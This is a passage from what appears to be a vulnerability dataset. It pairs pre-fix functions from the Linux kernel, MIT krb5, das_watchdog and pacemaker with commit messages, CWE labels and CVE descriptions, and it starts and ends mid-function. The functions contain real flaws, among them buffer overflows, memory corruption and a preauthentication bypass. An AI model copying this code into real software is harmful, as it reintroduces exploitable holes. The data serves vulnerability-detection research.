rt6_set_expires(rt, jiffies + (HZ * lifetime));
if (ra_msg->icmph.icmp6_hop_limit) {
in6_dev->cnf.hop_limit = ra_msg->icmph.icmp6_hop_limit;
if (rt)
dst_metric_set(&rt->dst, RTAX_HOPLIMIT,
ra_msg->icmph.icmp6_hop_limit);
}
skip_defrtr:
/*
* Update Reachable Time and Retrans Timer
*/
if (in6_dev->nd_parms) {
unsigned long rtime = ntohl(ra_msg->retrans_timer);
if (rtime && rtime/1000 < MAX_SCHEDULE_TIMEOUT/HZ) {
rtime = (rtime*HZ)/1000;
if (rtime < HZ/10)
rtime = HZ/10;
NEIGH_VAR_SET(in6_dev->nd_parms, RETRANS_TIME, rtime);
in6_dev->tstamp = jiffies;
inet6_ifinfo_notify(RTM_NEWLINK, in6_dev);
}
rtime = ntohl(ra_msg->reachable_time);
if (rtime && rtime/1000 < MAX_SCHEDULE_TIMEOUT/(3*HZ)) {
rtime = (rtime*HZ)/1000;
if (rtime < HZ/10)
rtime = HZ/10;
if (rtime != NEIGH_VAR(in6_dev->nd_parms, BASE_REACHABLE_TIME)) {
NEIGH_VAR_SET(in6_dev->nd_parms,
BASE_REACHABLE_TIME, rtime);
NEIGH_VAR_SET(in6_dev->nd_parms,
GC_STALETIME, 3 * rtime);
in6_dev->nd_parms->reachable_time = neigh_rand_reach_time(rtime);
in6_dev->tstamp = jiffies;
inet6_ifinfo_notify(RTM_NEWLINK, in6_dev);
}
}
}
skip_linkparms:
/*
* Process options.
*/
if (!neigh)
neigh = __neigh_lookup(&nd_tbl, &ipv6_hdr(skb)->saddr,
skb->dev, 1);
if (neigh) {
u8 *lladdr = NULL;
if (ndopts.nd_opts_src_lladdr) {
lladdr = ndisc_opt_addr_data(ndopts.nd_opts_src_lladdr,
skb->dev);
if (!lladdr) {
ND_PRINTK(2, warn,
"RA: invalid link-layer address length\n");
goto out;
}
}
neigh_update(neigh, lladdr, NUD_STALE,
NEIGH_UPDATE_F_WEAK_OVERRIDE|
NEIGH_UPDATE_F_OVERRIDE|
NEIGH_UPDATE_F_OVERRIDE_ISROUTER|
NEIGH_UPDATE_F_ISROUTER);
}
if (!ipv6_accept_ra(in6_dev)) {
ND_PRINTK(2, info,
"RA: %s, accept_ra is false for dev: %s\n",
__func__, skb->dev->name);
goto out;
}
#ifdef CONFIG_IPV6_ROUTE_INFO
if (!in6_dev->cnf.accept_ra_from_local &&
ipv6_chk_addr(dev_net(in6_dev->dev), &ipv6_hdr(skb)->saddr,
NULL, 0)) {
ND_PRINTK(2, info,
"RA from local address detected on dev: %s: router info ignored.\n",
skb->dev->name);
goto skip_routeinfo;
}
if (in6_dev->cnf.accept_ra_rtr_pref && ndopts.nd_opts_ri) {
struct nd_opt_hdr *p;
for (p = ndopts.nd_opts_ri;
p;
p = ndisc_next_option(p, ndopts.nd_opts_ri_end)) {
struct route_info *ri = (struct route_info *)p;
#ifdef CONFIG_IPV6_NDISC_NODETYPE
if (skb->ndisc_nodetype == NDISC_NODETYPE_NODEFAULT &&
ri->prefix_len == 0)
continue;
#endif
if (ri->prefix_len == 0 &&
!in6_dev->cnf.accept_ra_defrtr)
continue;
if (ri->prefix_len > in6_dev->cnf.accept_ra_rt_info_max_plen)
continue;
rt6_route_rcv(skb->dev, (u8 *)p, (p->nd_opt_len) << 3,
&ipv6_hdr(skb)->saddr);
}
}
skip_routeinfo:
#endif
#ifdef CONFIG_IPV6_NDISC_NODETYPE
/* skip link-specific ndopts from interior routers */
if (skb->ndisc_nodetype == NDISC_NODETYPE_NODEFAULT) {
ND_PRINTK(2, info,
"RA: %s, nodetype is NODEFAULT (interior routes), dev: %s\n",
__func__, skb->dev->name);
goto out;
}
#endif
if (in6_dev->cnf.accept_ra_pinfo && ndopts.nd_opts_pi) {
struct nd_opt_hdr *p;
for (p = ndopts.nd_opts_pi;
p;
p = ndisc_next_option(p, ndopts.nd_opts_pi_end)) {
addrconf_prefix_rcv(skb->dev, (u8 *)p,
(p->nd_opt_len) << 3,
ndopts.nd_opts_src_lladdr != NULL);
}
}
if (ndopts.nd_opts_mtu && in6_dev->cnf.accept_ra_mtu) {
__be32 n;
u32 mtu;
memcpy(&n, ((u8 *)(ndopts.nd_opts_mtu+1))+2, sizeof(mtu));
mtu = ntohl(n);
if (mtu < IPV6_MIN_MTU || mtu > skb->dev->mtu) {
ND_PRINTK(2, warn, "RA: invalid mtu: %d\n", mtu);
} else if (in6_dev->cnf.mtu6 != mtu) {
in6_dev->cnf.mtu6 = mtu;
if (rt)
dst_metric_set(&rt->dst, RTAX_MTU, mtu);
rt6_mtu_change(skb->dev, mtu);
}
}
if (ndopts.nd_useropts) {
struct nd_opt_hdr *p;
for (p = ndopts.nd_useropts;
p;
p = ndisc_next_useropt(p, ndopts.nd_useropts_end)) {
ndisc_ra_useropt(skb, p);
}
}
if (ndopts.nd_opts_tgt_lladdr || ndopts.nd_opts_rh) {
ND_PRINTK(2, warn, "RA: invalid RA options\n");
}
out:
ip6_rt_put(rt);
if (neigh)
neigh_release(neigh);
}
| 143,930,665,896,709,250,000,000,000,000,000,000,000 | ndisc.c | 115,440,394,696,074,500,000,000,000,000,000,000,000 | [
"CWE-17"
] | CVE-2015-2922 | The ndisc_router_discovery function in net/ipv6/ndisc.c in the Neighbor Discovery (ND) protocol implementation in the IPv6 stack in the Linux kernel before 3.19.6 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message. | https://nvd.nist.gov/vuln/detail/CVE-2015-2922 |
1,489 | das_watchdog | bd20bb02e75e2c0483832b52f2577253febfb690 | https://github.com/kmatheussen/das_watchdog | https://github.com/kmatheussen/das_watchdog/commit/bd20bb02e75e2c0483832b52f2577253febfb690 | Fix memory overflow if the name of an environment is larger than 500 characters. Bug found by Adam Sampson. | 1 | static char *get_pid_environ_val(pid_t pid,char *val){
char temp[500];
int i=0;
int foundit=0;
FILE *fp;
sprintf(temp,"/proc/%d/environ",pid);
fp=fopen(temp,"r");
if(fp==NULL)
return NULL;
for(;;){
temp[i]=fgetc(fp);
if(foundit==1 && (temp[i]==0 || temp[i]=='\0' || temp[i]==EOF)){
char *ret;
temp[i]=0;
ret=malloc(strlen(temp)+10);
sprintf(ret,"%s",temp);
fclose(fp);
return ret;
}
switch(temp[i]){
case EOF:
fclose(fp);
return NULL;
case '=':
temp[i]=0;
if(!strcmp(temp,val)){
foundit=1;
}
i=0;
break;
case '\0':
i=0;
break;
default:
i++;
}
}
}
| 127,977,327,279,497,000,000,000,000,000,000,000,000 | das_watchdog.c | 25,596,189,492,826,565,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-2831 | Buffer overflow in das_watchdog 0.9.0 allows local users to execute arbitrary code with root privileges via a large string in the XAUTHORITY environment variable. | https://nvd.nist.gov/vuln/detail/CVE-2015-2831 |
1,490 | krb5 | 3db8dfec1ef50ddd78d6ba9503185995876a39fd | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/3db8dfec1ef50ddd78d6ba9503185995876a39fd | Fix IAKERB context export/import [CVE-2015-2698]
The patches for CVE-2015-2696 contained a regression in the newly
added IAKERB iakerb_gss_export_sec_context() function, which could
cause it to corrupt memory. Fix the regression by properly
dereferencing the context_handle pointer before casting it.
Also, the patches did not implement an IAKERB gss_import_sec_context()
function, under the erroneous belief that an exported IAKERB context
would be tagged as a krb5 context. Implement it now to allow IAKERB
contexts to be successfully exported and imported after establishment.
CVE-2015-2698:
In any MIT krb5 release with the patches for CVE-2015-2696 applied, an
application which calls gss_export_sec_context() may experience memory
corruption if the context was established using the IAKERB mechanism.
Historically, some vulnerabilities of this nature can be translated
into remote code execution, though the necessary exploits must be
tailored to the individual application and are usually quite
complicated.
CVSSv2 Vector: AV:N/AC:H/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C
ticket: 8273 (new)
target_version: 1.14
tags: pullup | 1 | iakerb_gss_export_sec_context(OM_uint32 *minor_status,
gss_ctx_id_t *context_handle,
gss_buffer_t interprocess_token)
{
OM_uint32 maj;
iakerb_ctx_id_t ctx = (iakerb_ctx_id_t)context_handle;
/* We don't currently support exporting partially established contexts. */
if (!ctx->established)
return GSS_S_UNAVAILABLE;
maj = krb5_gss_export_sec_context(minor_status, &ctx->gssc,
interprocess_token);
if (ctx->gssc == GSS_C_NO_CONTEXT) {
iakerb_release_context(ctx);
*context_handle = GSS_C_NO_CONTEXT;
}
return maj;
}
| 327,336,867,353,175,950,000,000,000,000,000,000,000 | iakerb.c | 282,483,658,881,223,100,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-2698 | The iakerb_gss_export_sec_context function in lib/gssapi/krb5/iakerb.c in MIT Kerberos 5 (aka krb5) 1.14 pre-release 2015-09-14 improperly accesses a certain pointer, which allows remote authenticated users to cause a denial of service (memory corruption) or possibly have unspecified other impact by interacting with an application that calls the gss_export_sec_context function. NOTE: this vulnerability exists because of an incorrect fix for CVE-2015-2696. | https://nvd.nist.gov/vuln/detail/CVE-2015-2698 |
1,491 | krb5 | f0c094a1b745d91ef2f9a4eae2149aac026a5789 | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/f0c094a1b745d91ef2f9a4eae2149aac026a5789 | Fix build_principal memory bug [CVE-2015-2697]
In build_principal_va(), use k5memdup0() instead of strdup() to make a
copy of the realm, to ensure that we allocate the correct number of
bytes and do not read past the end of the input string. This bug
affects krb5_build_principal(), krb5_build_principal_va(), and
krb5_build_principal_alloc_va(). krb5_build_principal_ext() is not
affected.
CVE-2015-2697:
In MIT krb5 1.7 and later, an authenticated attacker may be able to
cause a KDC to crash using a TGS request with a large realm field
beginning with a null byte. If the KDC attempts to find a referral to
answer the request, it constructs a principal name for lookup using
krb5_build_principal() with the requested realm. Due to a bug in this
function, the null byte causes only one byte be allocated for the
realm field of the constructed principal, far less than its length.
Subsequent operations on the lookup principal may cause a read beyond
the end of the mapped memory region, causing the KDC process to crash.
CVSSv2: AV:N/AC:L/Au:S/C:N/I:N/A:C/E:POC/RL:OF/RC:C
ticket: 8252 (new)
target_version: 1.14
tags: pullup | 1 | build_principal_va(krb5_context context, krb5_principal princ,
unsigned int rlen, const char *realm, va_list ap)
{
krb5_error_code retval = 0;
char *r = NULL;
krb5_data *data = NULL;
krb5_int32 count = 0;
krb5_int32 size = 2; /* initial guess at needed space */
char *component = NULL;
data = malloc(size * sizeof(krb5_data));
if (!data) { retval = ENOMEM; }
if (!retval) {
r = strdup(realm);
if (!r) { retval = ENOMEM; }
}
while (!retval && (component = va_arg(ap, char *))) {
if (count == size) {
krb5_data *new_data = NULL;
size *= 2;
new_data = realloc(data, size * sizeof(krb5_data));
if (new_data) {
data = new_data;
} else {
retval = ENOMEM;
}
}
if (!retval) {
data[count].length = strlen(component);
data[count].data = strdup(component);
if (!data[count].data) { retval = ENOMEM; }
count++;
}
}
if (!retval) {
princ->type = KRB5_NT_UNKNOWN;
princ->magic = KV5M_PRINCIPAL;
princ->realm = make_data(r, rlen);
princ->data = data;
princ->length = count;
r = NULL; /* take ownership */
data = NULL; /* take ownership */
}
if (data) {
while (--count >= 0) {
free(data[count].data);
}
free(data);
}
free(r);
return retval;
}
| 284,043,475,302,472,930,000,000,000,000,000,000,000 | bld_princ.c | 27,830,430,857,955,170,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-2697 | The build_principal_va function in lib/krb5/krb/bld_princ.c in MIT Kerberos 5 (aka krb5) before 1.14 allows remote authenticated users to cause a denial of service (out-of-bounds read and KDC crash) via an initial '\0' character in a long realm field within a TGS request. | https://nvd.nist.gov/vuln/detail/CVE-2015-2697 |
1,523 | krb5 | e3b5a5e5267818c97750b266df50b6a3d4649604 | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/e3b5a5e5267818c97750b266df50b6a3d4649604 | Prevent requires_preauth bypass [CVE-2015-2694]
In the OTP kdcpreauth module, don't set the TKT_FLG_PRE_AUTH bit until
the request is successfully verified. In the PKINIT kdcpreauth
module, don't respond with code 0 on empty input or an unconfigured
realm. Together these bugs could cause the KDC preauth framework to
erroneously treat a request as pre-authenticated.
CVE-2015-2694:
In MIT krb5 1.12 and later, when the KDC is configured with PKINIT
support, an unauthenticated remote attacker can bypass the
requires_preauth flag on a client principal and obtain a ciphertext
encrypted in the principal's long-term key. This ciphertext could be
used to conduct an off-line dictionary attack against the user's
password.
CVSSv2 Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N/E:POC/RL:OF/RC:C
ticket: 8160 (new)
target_version: 1.13.2
tags: pullup
subject: requires_preauth bypass in PKINIT-enabled KDC [CVE-2015-2694] | 1 | pkinit_server_verify_padata(krb5_context context,
krb5_data *req_pkt,
krb5_kdc_req * request,
krb5_enc_tkt_part * enc_tkt_reply,
krb5_pa_data * data,
krb5_kdcpreauth_callbacks cb,
krb5_kdcpreauth_rock rock,
krb5_kdcpreauth_moddata moddata,
krb5_kdcpreauth_verify_respond_fn respond,
void *arg)
{
krb5_error_code retval = 0;
krb5_data authp_data = {0, 0, NULL}, krb5_authz = {0, 0, NULL};
krb5_pa_pk_as_req *reqp = NULL;
krb5_pa_pk_as_req_draft9 *reqp9 = NULL;
krb5_auth_pack *auth_pack = NULL;
krb5_auth_pack_draft9 *auth_pack9 = NULL;
pkinit_kdc_context plgctx = NULL;
pkinit_kdc_req_context reqctx = NULL;
krb5_checksum cksum = {0, 0, 0, NULL};
krb5_data *der_req = NULL;
int valid_eku = 0, valid_san = 0;
krb5_data k5data;
int is_signed = 1;
krb5_pa_data **e_data = NULL;
krb5_kdcpreauth_modreq modreq = NULL;
pkiDebug("pkinit_verify_padata: entered!\n");
if (data == NULL || data->length <= 0 || data->contents == NULL) {
(*respond)(arg, 0, NULL, NULL, NULL);
return;
}
if (moddata == NULL) {
(*respond)(arg, EINVAL, NULL, NULL, NULL);
return;
}
plgctx = pkinit_find_realm_context(context, moddata, request->server);
if (plgctx == NULL) {
(*respond)(arg, 0, NULL, NULL, NULL);
return;
}
#ifdef DEBUG_ASN1
print_buffer_bin(data->contents, data->length, "/tmp/kdc_as_req");
#endif
/* create a per-request context */
retval = pkinit_init_kdc_req_context(context, &reqctx);
if (retval)
goto cleanup;
reqctx->pa_type = data->pa_type;
PADATA_TO_KRB5DATA(data, &k5data);
switch ((int)data->pa_type) {
case KRB5_PADATA_PK_AS_REQ:
pkiDebug("processing KRB5_PADATA_PK_AS_REQ\n");
retval = k5int_decode_krb5_pa_pk_as_req(&k5data, &reqp);
if (retval) {
pkiDebug("decode_krb5_pa_pk_as_req failed\n");
goto cleanup;
}
#ifdef DEBUG_ASN1
print_buffer_bin(reqp->signedAuthPack.data,
reqp->signedAuthPack.length,
"/tmp/kdc_signed_data");
#endif
retval = cms_signeddata_verify(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx, CMS_SIGN_CLIENT,
plgctx->opts->require_crl_checking,
(unsigned char *)
reqp->signedAuthPack.data, reqp->signedAuthPack.length,
(unsigned char **)&authp_data.data,
&authp_data.length,
(unsigned char **)&krb5_authz.data,
&krb5_authz.length, &is_signed);
break;
case KRB5_PADATA_PK_AS_REP_OLD:
case KRB5_PADATA_PK_AS_REQ_OLD:
pkiDebug("processing KRB5_PADATA_PK_AS_REQ_OLD\n");
retval = k5int_decode_krb5_pa_pk_as_req_draft9(&k5data, &reqp9);
if (retval) {
pkiDebug("decode_krb5_pa_pk_as_req_draft9 failed\n");
goto cleanup;
}
#ifdef DEBUG_ASN1
print_buffer_bin(reqp9->signedAuthPack.data,
reqp9->signedAuthPack.length,
"/tmp/kdc_signed_data_draft9");
#endif
retval = cms_signeddata_verify(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx, CMS_SIGN_DRAFT9,
plgctx->opts->require_crl_checking,
(unsigned char *)
reqp9->signedAuthPack.data, reqp9->signedAuthPack.length,
(unsigned char **)&authp_data.data,
&authp_data.length,
(unsigned char **)&krb5_authz.data,
&krb5_authz.length, NULL);
break;
default:
pkiDebug("unrecognized pa_type = %d\n", data->pa_type);
retval = EINVAL;
goto cleanup;
}
if (retval) {
pkiDebug("pkcs7_signeddata_verify failed\n");
goto cleanup;
}
if (is_signed) {
retval = verify_client_san(context, plgctx, reqctx, request->client,
&valid_san);
if (retval)
goto cleanup;
if (!valid_san) {
pkiDebug("%s: did not find an acceptable SAN in user "
"certificate\n", __FUNCTION__);
retval = KRB5KDC_ERR_CLIENT_NAME_MISMATCH;
goto cleanup;
}
retval = verify_client_eku(context, plgctx, reqctx, &valid_eku);
if (retval)
goto cleanup;
if (!valid_eku) {
pkiDebug("%s: did not find an acceptable EKU in user "
"certificate\n", __FUNCTION__);
retval = KRB5KDC_ERR_INCONSISTENT_KEY_PURPOSE;
goto cleanup;
}
} else { /* !is_signed */
if (!krb5_principal_compare(context, request->client,
krb5_anonymous_principal())) {
retval = KRB5KDC_ERR_PREAUTH_FAILED;
krb5_set_error_message(context, retval,
_("Pkinit request not signed, but client "
"not anonymous."));
goto cleanup;
}
}
#ifdef DEBUG_ASN1
print_buffer_bin(authp_data.data, authp_data.length, "/tmp/kdc_auth_pack");
#endif
OCTETDATA_TO_KRB5DATA(&authp_data, &k5data);
switch ((int)data->pa_type) {
case KRB5_PADATA_PK_AS_REQ:
retval = k5int_decode_krb5_auth_pack(&k5data, &auth_pack);
if (retval) {
pkiDebug("failed to decode krb5_auth_pack\n");
goto cleanup;
}
retval = krb5_check_clockskew(context,
auth_pack->pkAuthenticator.ctime);
if (retval)
goto cleanup;
/* check dh parameters */
if (auth_pack->clientPublicValue != NULL) {
retval = server_check_dh(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx,
&auth_pack->clientPublicValue->algorithm.parameters,
plgctx->opts->dh_min_bits);
if (retval) {
pkiDebug("bad dh parameters\n");
goto cleanup;
}
} else if (!is_signed) {
/*Anonymous pkinit requires DH*/
retval = KRB5KDC_ERR_PREAUTH_FAILED;
krb5_set_error_message(context, retval,
_("Anonymous pkinit without DH public "
"value not supported."));
goto cleanup;
}
der_req = cb->request_body(context, rock);
retval = krb5_c_make_checksum(context, CKSUMTYPE_NIST_SHA, NULL,
0, der_req, &cksum);
if (retval) {
pkiDebug("unable to calculate AS REQ checksum\n");
goto cleanup;
}
if (cksum.length != auth_pack->pkAuthenticator.paChecksum.length ||
k5_bcmp(cksum.contents,
auth_pack->pkAuthenticator.paChecksum.contents,
cksum.length) != 0) {
pkiDebug("failed to match the checksum\n");
#ifdef DEBUG_CKSUM
pkiDebug("calculating checksum on buf size (%d)\n",
req_pkt->length);
print_buffer(req_pkt->data, req_pkt->length);
pkiDebug("received checksum type=%d size=%d ",
auth_pack->pkAuthenticator.paChecksum.checksum_type,
auth_pack->pkAuthenticator.paChecksum.length);
print_buffer(auth_pack->pkAuthenticator.paChecksum.contents,
auth_pack->pkAuthenticator.paChecksum.length);
pkiDebug("expected checksum type=%d size=%d ",
cksum.checksum_type, cksum.length);
print_buffer(cksum.contents, cksum.length);
#endif
retval = KRB5KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED;
goto cleanup;
}
/* check if kdcPkId present and match KDC's subjectIdentifier */
if (reqp->kdcPkId.data != NULL) {
int valid_kdcPkId = 0;
retval = pkinit_check_kdc_pkid(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx,
(unsigned char *)reqp->kdcPkId.data,
reqp->kdcPkId.length, &valid_kdcPkId);
if (retval)
goto cleanup;
if (!valid_kdcPkId)
pkiDebug("kdcPkId in AS_REQ does not match KDC's cert"
"RFC says to ignore and proceed\n");
}
/* remember the decoded auth_pack for verify_padata routine */
reqctx->rcv_auth_pack = auth_pack;
auth_pack = NULL;
break;
case KRB5_PADATA_PK_AS_REP_OLD:
case KRB5_PADATA_PK_AS_REQ_OLD:
retval = k5int_decode_krb5_auth_pack_draft9(&k5data, &auth_pack9);
if (retval) {
pkiDebug("failed to decode krb5_auth_pack_draft9\n");
goto cleanup;
}
if (auth_pack9->clientPublicValue != NULL) {
retval = server_check_dh(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx,
&auth_pack9->clientPublicValue->algorithm.parameters,
plgctx->opts->dh_min_bits);
if (retval) {
pkiDebug("bad dh parameters\n");
goto cleanup;
}
}
/* remember the decoded auth_pack for verify_padata routine */
reqctx->rcv_auth_pack9 = auth_pack9;
auth_pack9 = NULL;
break;
}
/* remember to set the PREAUTH flag in the reply */
enc_tkt_reply->flags |= TKT_FLG_PRE_AUTH;
modreq = (krb5_kdcpreauth_modreq)reqctx;
reqctx = NULL;
cleanup:
if (retval && data->pa_type == KRB5_PADATA_PK_AS_REQ) {
pkiDebug("pkinit_verify_padata failed: creating e-data\n");
if (pkinit_create_edata(context, plgctx->cryptoctx, reqctx->cryptoctx,
plgctx->idctx, plgctx->opts, retval, &e_data))
pkiDebug("pkinit_create_edata failed\n");
}
switch ((int)data->pa_type) {
case KRB5_PADATA_PK_AS_REQ:
free_krb5_pa_pk_as_req(&reqp);
free(cksum.contents);
break;
case KRB5_PADATA_PK_AS_REP_OLD:
case KRB5_PADATA_PK_AS_REQ_OLD:
free_krb5_pa_pk_as_req_draft9(&reqp9);
}
free(authp_data.data);
free(krb5_authz.data);
if (reqctx != NULL)
pkinit_fini_kdc_req_context(context, reqctx);
free_krb5_auth_pack(&auth_pack);
free_krb5_auth_pack_draft9(context, &auth_pack9);
(*respond)(arg, retval, modreq, e_data, NULL);
}
| 7,409,460,042,177,961,000,000,000,000,000,000,000 | pkinit_srv.c | 27,162,181,412,772,705,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-2694 | The kdcpreauth modules in MIT Kerberos 5 (aka krb5) 1.12.x and 1.13.x before 1.13.2 do not properly track whether a client's request has been validated, which allows remote attackers to bypass an intended preauthentication requirement by providing (1) zero bytes of data or (2) an arbitrary realm name, related to plugins/preauth/otp/main.c and plugins/preauth/pkinit/pkinit_srv.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-2694 |
1,524 | linux | f84598bd7c851f8b0bf8cd0d7c3be0d73c432ff4 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f84598bd7c851f8b0bf8cd0d7c3be0d73c432ff4 | x86/microcode/intel: Guard against stack overflow in the loader
mc_saved_tmp is a static array allocated on the stack, we need to make
sure mc_saved_count stays within its bounds, otherwise we're overflowing
the stack in _save_mc(). A specially crafted microcode header could lead
to a kernel crash or potentially kernel execution.
Signed-off-by: Quentin Casasnovas <quentin.casasnovas@oracle.com>
Cc: "H. Peter Anvin" <hpa@zytor.com>
Cc: Fenghua Yu <fenghua.yu@intel.com>
Link: http://lkml.kernel.org/r/1422964824-22056-1-git-send-email-quentin.casasnovas@oracle.com
Signed-off-by: Borislav Petkov <bp@suse.de> | 1 | get_matching_model_microcode(int cpu, unsigned long start,
void *data, size_t size,
struct mc_saved_data *mc_saved_data,
unsigned long *mc_saved_in_initrd,
struct ucode_cpu_info *uci)
{
u8 *ucode_ptr = data;
unsigned int leftover = size;
enum ucode_state state = UCODE_OK;
unsigned int mc_size;
struct microcode_header_intel *mc_header;
struct microcode_intel *mc_saved_tmp[MAX_UCODE_COUNT];
unsigned int mc_saved_count = mc_saved_data->mc_saved_count;
int i;
while (leftover) {
mc_header = (struct microcode_header_intel *)ucode_ptr;
mc_size = get_totalsize(mc_header);
if (!mc_size || mc_size > leftover ||
microcode_sanity_check(ucode_ptr, 0) < 0)
break;
leftover -= mc_size;
/*
* Since APs with same family and model as the BSP may boot in
* the platform, we need to find and save microcode patches
* with the same family and model as the BSP.
*/
if (matching_model_microcode(mc_header, uci->cpu_sig.sig) !=
UCODE_OK) {
ucode_ptr += mc_size;
continue;
}
_save_mc(mc_saved_tmp, ucode_ptr, &mc_saved_count);
ucode_ptr += mc_size;
}
if (leftover) {
state = UCODE_ERROR;
goto out;
}
if (mc_saved_count == 0) {
state = UCODE_NFOUND;
goto out;
}
for (i = 0; i < mc_saved_count; i++)
mc_saved_in_initrd[i] = (unsigned long)mc_saved_tmp[i] - start;
mc_saved_data->mc_saved_count = mc_saved_count;
out:
return state;
}
| 43,839,155,311,078,540,000,000,000,000,000,000,000 | intel_early.c | 194,639,615,795,702,100,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-2666 | Stack-based buffer overflow in the get_matching_model_microcode function in arch/x86/kernel/cpu/microcode/intel_early.c in the Linux kernel before 4.0 allows context-dependent attackers to gain privileges by constructing a crafted microcode header and leveraging root privileges for write access to the initrd. | https://nvd.nist.gov/vuln/detail/CVE-2015-2666 |
1,529 | pacemaker | 84ac07c | https://github.com/ClusterLabs/pacemaker | https://github.com/ClusterLabs/pacemaker/commit/84ac07c | Fix: acl: Do not delay evaluation of added nodes in some situations
It is not appropriate when the node has no children as it is not a
placeholder | 1 | __xml_acl_post_process(xmlNode * xml)
{
xmlNode *cIter = __xml_first_child(xml);
xml_private_t *p = xml->_private;
if(is_set(p->flags, xpf_created)) {
xmlAttr *xIter = NULL;
/* Always allow new scaffolding, ie. node with no attributes or only an 'id' */
for (xIter = crm_first_attr(xml); xIter != NULL; xIter = xIter->next) {
const char *prop_name = (const char *)xIter->name;
if (strcmp(prop_name, XML_ATTR_ID) == 0) {
/* Delay the acl check */
continue;
} else if(__xml_acl_check(xml, NULL, xpf_acl_write)) {
crm_trace("Creation of %s=%s is allowed", crm_element_name(xml), ID(xml));
break;
} else {
char *path = xml_get_path(xml);
crm_trace("Cannot add new node %s at %s", crm_element_name(xml), path);
if(xml != xmlDocGetRootElement(xml->doc)) {
xmlUnlinkNode(xml);
xmlFreeNode(xml);
}
free(path);
return;
}
}
}
while (cIter != NULL) {
xmlNode *child = cIter;
cIter = __xml_next(cIter); /* In case it is free'd */
__xml_acl_post_process(child);
}
}
| 62,179,770,258,691,625,000,000,000,000,000,000,000 | xml.c | 2,819,314,212,835,514,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-1867 | Pacemaker before 1.1.13 does not properly evaluate added nodes, which allows remote read-only users to gain privileges via an acl command. | https://nvd.nist.gov/vuln/detail/CVE-2015-1867 |
1,532 | linux | f0d1bec9d58d4c038d0ac958c9af82be6eb18045 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f0d1bec9d58d4c038d0ac958c9af82be6eb18045 | new helper: copy_page_from_iter()
parallel to copy_page_to_iter(). pipe_write() switched to it (and became
->write_iter()).
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | pipe_write(struct kiocb *iocb, const struct iovec *_iov,
unsigned long nr_segs, loff_t ppos)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
ssize_t ret;
int do_wakeup;
struct iovec *iov = (struct iovec *)_iov;
size_t total_len;
ssize_t chars;
total_len = iov_length(iov, nr_segs);
/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;
do_wakeup = 0;
ret = 0;
__pipe_lock(pipe);
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}
/* We try to merge small writes */
chars = total_len & (PAGE_SIZE-1); /* size of the last buffer */
if (pipe->nrbufs && chars != 0) {
int lastbuf = (pipe->curbuf + pipe->nrbufs - 1) &
(pipe->buffers - 1);
struct pipe_buffer *buf = pipe->bufs + lastbuf;
const struct pipe_buf_operations *ops = buf->ops;
int offset = buf->offset + buf->len;
if (ops->can_merge && offset + chars <= PAGE_SIZE) {
int error, atomic = 1;
void *addr;
error = ops->confirm(pipe, buf);
if (error)
goto out;
iov_fault_in_pages_read(iov, chars);
redo1:
if (atomic)
addr = kmap_atomic(buf->page);
else
addr = kmap(buf->page);
error = pipe_iov_copy_from_user(offset + addr, iov,
chars, atomic);
if (atomic)
kunmap_atomic(addr);
else
kunmap(buf->page);
ret = error;
do_wakeup = 1;
if (error) {
if (atomic) {
atomic = 0;
goto redo1;
}
goto out;
}
buf->len += chars;
total_len -= chars;
ret = chars;
if (!total_len)
goto out;
}
}
for (;;) {
int bufs;
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
bufs = pipe->nrbufs;
if (bufs < pipe->buffers) {
int newbuf = (pipe->curbuf + bufs) & (pipe->buffers-1);
struct pipe_buffer *buf = pipe->bufs + newbuf;
struct page *page = pipe->tmp_page;
char *src;
int error, atomic = 1;
if (!page) {
page = alloc_page(GFP_HIGHUSER);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}
/* Always wake up, even if the copy fails. Otherwise
* we lock up (O_NONBLOCK-)readers that sleep due to
* syscall merging.
* FIXME! Is this really true?
*/
do_wakeup = 1;
chars = PAGE_SIZE;
if (chars > total_len)
chars = total_len;
iov_fault_in_pages_read(iov, chars);
redo2:
if (atomic)
src = kmap_atomic(page);
else
src = kmap(page);
error = pipe_iov_copy_from_user(src, iov, chars,
atomic);
if (atomic)
kunmap_atomic(src);
else
kunmap(page);
if (unlikely(error)) {
if (atomic) {
atomic = 0;
goto redo2;
}
if (!ret)
ret = error;
break;
}
ret += chars;
/* Insert it into the buffer array */
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = chars;
buf->flags = 0;
if (is_packetized(filp)) {
buf->ops = &packet_pipe_buf_ops;
buf->flags = PIPE_BUF_FLAG_PACKET;
}
pipe->nrbufs = ++bufs;
pipe->tmp_page = NULL;
total_len -= chars;
if (!total_len)
break;
}
if (bufs < pipe->buffers)
continue;
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}
if (do_wakeup) {
